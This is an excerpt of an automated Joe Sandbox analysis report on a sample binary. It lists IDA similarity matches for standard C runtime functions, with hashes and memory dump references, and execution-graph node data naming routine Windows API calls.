                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort
                                                    • String ID: $csm$csm
                                                    • API String ID: 4206212132-1512788406
                                                    • Opcode ID: 2045304a97019384742e1fa54be03ef2cb538ca31ca8d9edefceaee7868ace1c
                                                    • Instruction ID: 8eb01ae0897bd2782086f79d85a22c2c9f52c684d5f8b85f4c3a735578bd8d84
                                                    • Opcode Fuzzy Hash: 2045304a97019384742e1fa54be03ef2cb538ca31ca8d9edefceaee7868ace1c
                                                    • Instruction Fuzzy Hash: F471A232908A918AD7608F2A94C17797BA0FB06FA8F148175EF8C07BA9CB3CD459C741
                                                    APIs
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148B3F13
                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE148B3F23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                    • String ID: csm$csm
                                                    • API String ID: 4108983575-3733052814
                                                    • Opcode ID: 17ae4d1ae201bf5ff5bd0027379854c8b70b62102f0a47126d9ef4f452e95dfa
                                                    • Instruction ID: cf5e1d51bb9c836e4de9b11666ad1ce12af940239f736813bbb24a5875005e43
                                                    • Opcode Fuzzy Hash: 17ae4d1ae201bf5ff5bd0027379854c8b70b62102f0a47126d9ef4f452e95dfa
                                                    • Instruction Fuzzy Hash: 4E515032908E828AEB648F17948426976A0FB46BA5F144176FF9D47BE5CF3CE459C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: NameName::
                                                    • String ID: %lf
                                                    • API String ID: 1333004437-2891890143
                                                    • Opcode ID: d5298ca127414f2580a14f53600500394f249bd586459cb27b5a413574188a2a
                                                    • Instruction ID: 162d7a2983eb44388530bff4f9116ac5e02872313ce5de98db0c38f3ff117437
                                                    • Opcode Fuzzy Hash: d5298ca127414f2580a14f53600500394f249bd586459cb27b5a413574188a2a
                                                    • Instruction Fuzzy Hash: E531C67290CE9189EA20CB26E8902B9B3A0FB87794F8481B1F9DD87765CF3CD509C740
                                                    APIs
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148B243E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abortterminate
                                                    • String ID: MOC$RCC$csm
                                                    • API String ID: 661698970-2671469338
                                                    • Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                    • Instruction ID: 238ec9fd24a209618b338e790c8e54bd6575b2e770a68b9a144427b62925cbc4
                                                    • Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                    • Instruction Fuzzy Hash: F1F0AF36918A42C9EB505F26E1C51693260FB49B64F0855B2EB4C03372CF3CE4A4CB02
                                                    APIs
                                                    • __C_specific_handler.LIBVCRUNTIME ref: 00007FFE148BE8E0
                                                      • Part of subcall function 00007FFE148BEB20: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE148BEBE0
                                                      • Part of subcall function 00007FFE148BEB20: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE148BE8E5), ref: 00007FFE148BEC2F
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148BE90A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                    • String ID: csm$f
                                                    • API String ID: 2451123448-629598281
                                                    • Opcode ID: a035d3fd41b4857b63fc8c8a091b4ec2a9cd294fa95b54752a5867f425a35df2
                                                    • Instruction ID: 8287179fc10f2bb2b41e34bd159c282e12898c690b76ec49c9e6f7134086ba0c
                                                    • Opcode Fuzzy Hash: a035d3fd41b4857b63fc8c8a091b4ec2a9cd294fa95b54752a5867f425a35df2
                                                    • Instruction Fuzzy Hash: F6E0E531C0CE4298EB606B23B1C127E26A0BF06B74F1480B1FA48073A6CF3CD4A88702
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: a1e38ebea857c677fef0ae28369812a07d13309e9ca06832320585fad5392e0f
                                                    • Instruction ID: 5504bf6370e3a158e222f3340e01efea5a5dadb75a8e7fbbcb79423911582230
                                                    • Opcode Fuzzy Hash: a1e38ebea857c677fef0ae28369812a07d13309e9ca06832320585fad5392e0f
                                                    • Instruction Fuzzy Hash: CE914A72E08F668DFB118B66D8803EC27A1BB06768F9540B5EE4D177A5DF7CA849C340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$NameName::
                                                    • String ID:
                                                    • API String ID: 168861036-0
                                                    • Opcode ID: acbfbbe0c511e3698657a471b19ca6b2ed0dcf73ad2ddb8601ece0c2f14e2016
                                                    • Instruction ID: ab1bf7dfacaaf250f78813a0a99bda3d7dcda20fb85748da71e8e8d30b197e14
                                                    • Opcode Fuzzy Hash: acbfbbe0c511e3698657a471b19ca6b2ed0dcf73ad2ddb8601ece0c2f14e2016
                                                    • Instruction Fuzzy Hash: 18516C72A18E568CEB11CF66E8807BC77A0BB46764F988071EA0E477A5CF3DE549C740
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: e0ef2515f9d96f2c1e3124781f903358e6b97f310e73e21928eaf0e85632baf0
                                                    • Instruction ID: 9d886b8ce61d7f7befc25a0781c89743c58e7991dc3059930c100e7b94388bcc
                                                    • Opcode Fuzzy Hash: e0ef2515f9d96f2c1e3124781f903358e6b97f310e73e21928eaf0e85632baf0
                                                    • Instruction Fuzzy Hash: 98416972A08B5589FB01CF69D8803AC37B0F746B58F988079EA8D677A9DF7C9449C310
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort$CreateFrameInfo
                                                    • String ID: csm
                                                    • API String ID: 2697087660-1018135373
                                                    • Opcode ID: 358f0a59b8303083cc6c94dc4aef9fef89783b629f176a2df5e4f3a0ac74caac
                                                    • Instruction ID: c373d8cd2815cf825c956d7947511c73ade3c19bfbafe98ac5f0aca6ff186188
                                                    • Opcode Fuzzy Hash: 358f0a59b8303083cc6c94dc4aef9fef89783b629f176a2df5e4f3a0ac74caac
                                                    • Instruction Fuzzy Hash: 00515E36618B818AD620EB17E48126E77A4FB8ABA4F140575EF8D07B65CF3CE465CB01
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: void$void
                                                    • API String ID: 2943138195-3746155364
                                                    • Opcode ID: 9af3552a770d8b2508846e27a2f9d583d39522cb9c209f0b45164149649c8dbb
                                                    • Instruction ID: 81610597e75c8314faec84ae6de85f8b6a14502120c38b321ad0559d19f6b12d
                                                    • Opcode Fuzzy Hash: 9af3552a770d8b2508846e27a2f9d583d39522cb9c209f0b45164149649c8dbb
                                                    • Instruction Fuzzy Hash: CE310872E18E659CFB108BA5D8814EC37B0BB4A758F840176EE4E62B69DF3C9148C750
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionRaise
                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                    • API String ID: 3685223789-3176238549
                                                    • Opcode ID: c4c42506f718241a9074068d813cd8d6875e169c3d23e947c08b75e606e33840
                                                    • Instruction ID: 3399324d074d0203722b2b2c3b10c835f6de00d9f783f6f1d36cb349d11eb6fd
                                                    • Opcode Fuzzy Hash: c4c42506f718241a9074068d813cd8d6875e169c3d23e947c08b75e606e33840
                                                    • Instruction Fuzzy Hash: 3601B171A29E0695EE40AB1AE8D05B86320FF41BA8F8050B1F50E077BAEF6CD40DC701
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                     • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                     • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                    • Instruction ID: fe3b0638edef58db79980c3ae3778946577b6090a82d6a1b415d4ef8f4905af8
                                                    • Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                    • Instruction Fuzzy Hash: D6114F32618F8182EB518F16F48026977A5FB89B98F584271EE8C07B69DF3DD555CB00
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FFE148B65B9,?,?,?,?,00007FFE148BFA12,?,?,?,?,?), ref: 00007FFE148B674B
                                                    • SetLastError.KERNEL32(?,?,?,00007FFE148B65B9,?,?,?,?,00007FFE148BFA12,?,?,?,?,?), ref: 00007FFE148B67D4
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmp
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 0de69f98998d971f2423aba4fea73eca4e0f6e3aee6112935789783a1afdc9a5
                                                    • Instruction ID: db7b23100ed42ea45bb8f5d4222ca38e75679be15cc3e7421d11e06d6941aef6
                                                    • Opcode Fuzzy Hash: 0de69f98998d971f2423aba4fea73eca4e0f6e3aee6112935789783a1afdc9a5
                                                    • Instruction Fuzzy Hash: 1A118134A09E1246FE209B23A8D46742290BF46BB4F8447B4FD2E137F5DF2CE8598715

                                                    Execution Graph

                                                    Execution Coverage:11.9%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:13.6%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:27
26255->26258 26257 7ff6c03822a0 _handle_error 8 API calls 26256->26257 26259 7ff6c03524f3 26257->26259 26260 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26258->26260 26259->25774 26261 7ff6c035250a 26260->26261 26263 7ff6c03513ad 26262->26263 26271 7ff6c035142d GetWindowTextW 26262->26271 26264 7ff6c035143d 26263->26264 26266 7ff6c03513ce 26263->26266 26282 7ff6c0352018 33 API calls std::_Xinvalid_argument 26264->26282 26268 7ff6c03513db __scrt_get_show_window_mode 26266->26268 26272 7ff6c0382150 26266->26272 26281 7ff6c035197c 31 API calls _invalid_parameter_noinfo_noreturn 26268->26281 26271->26253 26276 7ff6c038215b 26272->26276 26273 7ff6c0382174 26273->26268 26275 7ff6c038217a 26277 7ff6c0382185 26275->26277 26286 7ff6c0382efc RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::bad_alloc::bad_alloc 26275->26286 26276->26273 26276->26275 26283 7ff6c038bb40 26276->26283 26287 7ff6c0351f80 33 API calls 3 library calls 26277->26287 26280 7ff6c038218b 26281->26271 26288 7ff6c038bb80 26283->26288 26286->26277 26287->26280 26293 7ff6c038f318 EnterCriticalSection 26288->26293 26294->25791 26296->25799 26304 7ff6c03695f8 26297->26304 26300 7ff6c0369799 26302 7ff6c03822a0 _handle_error 8 API calls 26300->26302 26301 7ff6c03697c0 31 API calls 26301->26300 26303 7ff6c03697b2 26302->26303 26303->25811 26303->25812 26305 7ff6c0369652 26304->26305 26306 7ff6c03696f0 26304->26306 26307 7ff6c0370ee8 WideCharToMultiByte 26305->26307 26311 7ff6c0369680 26305->26311 26309 7ff6c03822a0 _handle_error 8 API calls 26306->26309 26307->26311 26308 7ff6c03696af 26315 7ff6c038a1f0 31 API calls 2 library calls 26308->26315 26310 7ff6c0369724 26309->26310 26310->26300 26310->26301 26311->26308 26314 7ff6c036aa48 45 API calls 2 library calls 26311->26314 26314->26308 26315->26306 26332 7ff6c036d44c 26316->26332 26320 7ff6c0389e70 swprintf 46 API calls 26322 7ff6c036d861 swprintf 26320->26322 26321 7ff6c036d91f 26324 7ff6c036d993 26321->26324 26326 
7ff6c036d9bb 26321->26326 26322->26320 26329 7ff6c036d8f0 26322->26329 26346 7ff6c0359d78 33 API calls 26322->26346 26325 7ff6c03822a0 _handle_error 8 API calls 26324->26325 26327 7ff6c036d9a7 26325->26327 26328 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26326->26328 26327->25817 26330 7ff6c036d9c0 26328->26330 26329->26321 26347 7ff6c0359d78 33 API calls 26329->26347 26333 7ff6c036d5e1 26332->26333 26334 7ff6c036d47e 26332->26334 26336 7ff6c036cb3c 26333->26336 26334->26333 26335 7ff6c0351744 33 API calls 26334->26335 26335->26334 26337 7ff6c036cb72 26336->26337 26344 7ff6c036cc3c 26336->26344 26338 7ff6c036cb82 26337->26338 26341 7ff6c036cc37 26337->26341 26343 7ff6c036cbdc 26337->26343 26338->26322 26348 7ff6c0351f80 33 API calls 3 library calls 26341->26348 26343->26338 26345 7ff6c0382150 33 API calls 26343->26345 26349 7ff6c0352004 33 API calls std::_Xinvalid_argument 26344->26349 26345->26338 26346->26322 26347->26321 26348->26344 26351 7ff6c037adbc GetMessageW 26350->26351 26352 7ff6c037ae00 GetDlgItem 26350->26352 26353 7ff6c037addb IsDialogMessageW 26351->26353 26354 7ff6c037adea TranslateMessage DispatchMessageW 26351->26354 26352->25820 26352->25821 26353->26352 26353->26354 26354->26352 26355->25842 26356->25840 26358 7ff6c035713b 26357->26358 26359 7ff6c0357206 26357->26359 26364 7ff6c035714b memcpy_s 26358->26364 26366 7ff6c0353f48 33 API calls 2 library calls 26358->26366 26367 7ff6c035704c 47 API calls memcpy_s 26359->26367 26362 7ff6c0357273 26362->25858 26363 7ff6c035720b 26363->26362 26368 7ff6c035889c 8 API calls memcpy_s 26363->26368 26364->25858 26366->26364 26367->26363 26368->26363 26370 7ff6c0366a0b 26369->26370 26386 7ff6c0366a04 26369->26386 26372 7ff6c035129c 33 API calls 26370->26372 26371 7ff6c03822a0 _handle_error 8 API calls 26373 7ff6c03621c9 26371->26373 26374 7ff6c0366a36 26372->26374 26373->25874 26373->25875 26375 7ff6c0366c87 26374->26375 26376 7ff6c0366a56 26374->26376 26377 7ff6c036629c 35 API calls 
26375->26377 26378 7ff6c0366a70 26376->26378 26400 7ff6c0366b09 26376->26400 26381 7ff6c0366ca6 26377->26381 26379 7ff6c036706b 26378->26379 26442 7ff6c035c0a8 33 API calls 2 library calls 26378->26442 26450 7ff6c0352004 33 API calls std::_Xinvalid_argument 26379->26450 26380 7ff6c0366eaf 26426 7ff6c036708f 26380->26426 26447 7ff6c035c0a8 33 API calls 2 library calls 26380->26447 26381->26380 26383 7ff6c0366cdb 26381->26383 26387 7ff6c0366b04 26381->26387 26390 7ff6c036707d 26383->26390 26445 7ff6c035c0a8 33 API calls 2 library calls 26383->26445 26384 7ff6c0367071 26398 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26384->26398 26386->26371 26387->26384 26387->26386 26391 7ff6c0367095 26387->26391 26394 7ff6c0367066 26387->26394 26388 7ff6c0366ac3 26401 7ff6c0351fa0 31 API calls 26388->26401 26408 7ff6c0366ad5 memcpy_s 26388->26408 26451 7ff6c0352004 33 API calls std::_Xinvalid_argument 26390->26451 26393 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26391->26393 26399 7ff6c036709b 26393->26399 26405 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26394->26405 26395 7ff6c0366f16 26448 7ff6c03511cc 33 API calls memcpy_s 26395->26448 26406 7ff6c0367077 26398->26406 26412 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26399->26412 26400->26387 26407 7ff6c035129c 33 API calls 26400->26407 26401->26408 26403 7ff6c0367083 26415 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26403->26415 26404 7ff6c0351fa0 31 API calls 26404->26387 26405->26379 26410 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26406->26410 26413 7ff6c0366b7e 26407->26413 26408->26404 26409 7ff6c0366f29 26449 7ff6c036576c 33 API calls memcpy_s 26409->26449 26410->26390 26411 7ff6c0351fa0 31 API calls 26416 7ff6c0366db5 26411->26416 26417 7ff6c03670a1 26412->26417 26443 7ff6c03657e0 33 API calls 26413->26443 26419 7ff6c0367089 26415->26419 26429 7ff6c0366de1 26416->26429 26446 7ff6c0351744 33 API calls 4 library calls 
26416->26446 26452 7ff6c035704c 47 API calls memcpy_s 26419->26452 26420 7ff6c0366d36 memcpy_s 26420->26403 26420->26411 26421 7ff6c0366b93 26444 7ff6c035e174 33 API calls 2 library calls 26421->26444 26422 7ff6c0351fa0 31 API calls 26425 7ff6c0366fac 26422->26425 26428 7ff6c0351fa0 31 API calls 26425->26428 26453 7ff6c0352004 33 API calls std::_Xinvalid_argument 26426->26453 26427 7ff6c0366f39 memcpy_s 26427->26399 26427->26422 26431 7ff6c0366fb6 26428->26431 26429->26419 26435 7ff6c035129c 33 API calls 26429->26435 26430 7ff6c0351fa0 31 API calls 26433 7ff6c0366c2d 26430->26433 26434 7ff6c0351fa0 31 API calls 26431->26434 26436 7ff6c0351fa0 31 API calls 26433->26436 26434->26387 26437 7ff6c0366e82 26435->26437 26436->26387 26439 7ff6c0352034 33 API calls 26437->26439 26438 7ff6c0366ba9 memcpy_s 26438->26406 26438->26430 26440 7ff6c0366e9f 26439->26440 26441 7ff6c0351fa0 31 API calls 26440->26441 26441->26387 26442->26388 26443->26421 26444->26438 26445->26420 26446->26429 26447->26395 26448->26409 26449->26427 26452->26426 26455 7ff6c03620c2 26454->26455 26456 7ff6c03620aa 26454->26456 26457 7ff6c03620e6 26455->26457 26460 7ff6c035b554 99 API calls 26455->26460 26456->26455 26458 7ff6c03620b6 CloseHandle 26456->26458 26457->25882 26458->26455 26460->26457 26462 7ff6c037a9b6 26461->26462 26463 7ff6c037a9af 26461->26463 26462->26463 26615 7ff6c0351744 33 API calls 4 library calls 26462->26615 26463->25898 26465->25898 26467 7ff6c037a686 26466->26467 26468 7ff6c037a3ff 26466->26468 26469 7ff6c03822a0 _handle_error 8 API calls 26467->26469 26616 7ff6c037cd78 33 API calls 26468->26616 26472 7ff6c037a697 26469->26472 26471 7ff6c037a41e 26473 7ff6c035129c 33 API calls 26471->26473 26472->25967 26474 7ff6c037a45e 26473->26474 26475 7ff6c035129c 33 API calls 26474->26475 26476 7ff6c037a497 26475->26476 26477 7ff6c035129c 33 API calls 26476->26477 26478 7ff6c037a4ca 26477->26478 26617 7ff6c037a7b4 33 API calls _invalid_parameter_noinfo_noreturn 26478->26617 26480 
7ff6c037a6b4 26481 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26480->26481 26482 7ff6c037a6ba 26481->26482 26484 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26482->26484 26483 7ff6c037a4f3 26483->26480 26483->26482 26485 7ff6c037a6c0 26483->26485 26486 7ff6c03520b0 33 API calls 26483->26486 26489 7ff6c037a605 26483->26489 26484->26485 26487 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26485->26487 26486->26489 26488 7ff6c037a6c6 26487->26488 26491 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26488->26491 26489->26467 26489->26488 26490 7ff6c037a6af 26489->26490 26493 7ff6c0387884 _invalid_parameter_noinfo_noreturn 31 API calls 26490->26493 26492 7ff6c037a6cc 26491->26492 26494 7ff6c035255c 61 API calls 26492->26494 26493->26480 26495 7ff6c037a715 26494->26495 26496 7ff6c037a731 26495->26496 26497 7ff6c037a781 SetDlgItemTextW 26495->26497 26501 7ff6c037a721 26495->26501 26498 7ff6c03822a0 _handle_error 8 API calls 26496->26498 26497->26496 26499 7ff6c037a7a7 26498->26499 26499->25967 26500 7ff6c037a72d 26500->26496 26502 7ff6c037a737 EndDialog 26500->26502 26501->26496 26501->26500 26618 7ff6c036babc 26501->26618 26502->26496 26510 7ff6c037f4a9 __scrt_get_show_window_mode 26504->26510 26522 7ff6c037f7fd 26504->26522 26505 7ff6c0351fa0 31 API calls 26506 7ff6c037f81c 26505->26506 26507 7ff6c03822a0 _handle_error 8 API calls 26506->26507 26508 7ff6c037f828 26507->26508 26508->25975 26509 7ff6c037f604 26512 7ff6c035129c 33 API calls 26509->26512 26510->26509 26637 7ff6c0371344 CompareStringW 26510->26637 26513 7ff6c037f640 26512->26513 26514 7ff6c0363268 51 API calls 26513->26514 26515 7ff6c037f64a 26514->26515 26516 7ff6c0351fa0 31 API calls 26515->26516 26519 7ff6c037f655 26516->26519 26517 7ff6c037f6c2 ShellExecuteExW 26518 7ff6c037f7c6 26517->26518 26524 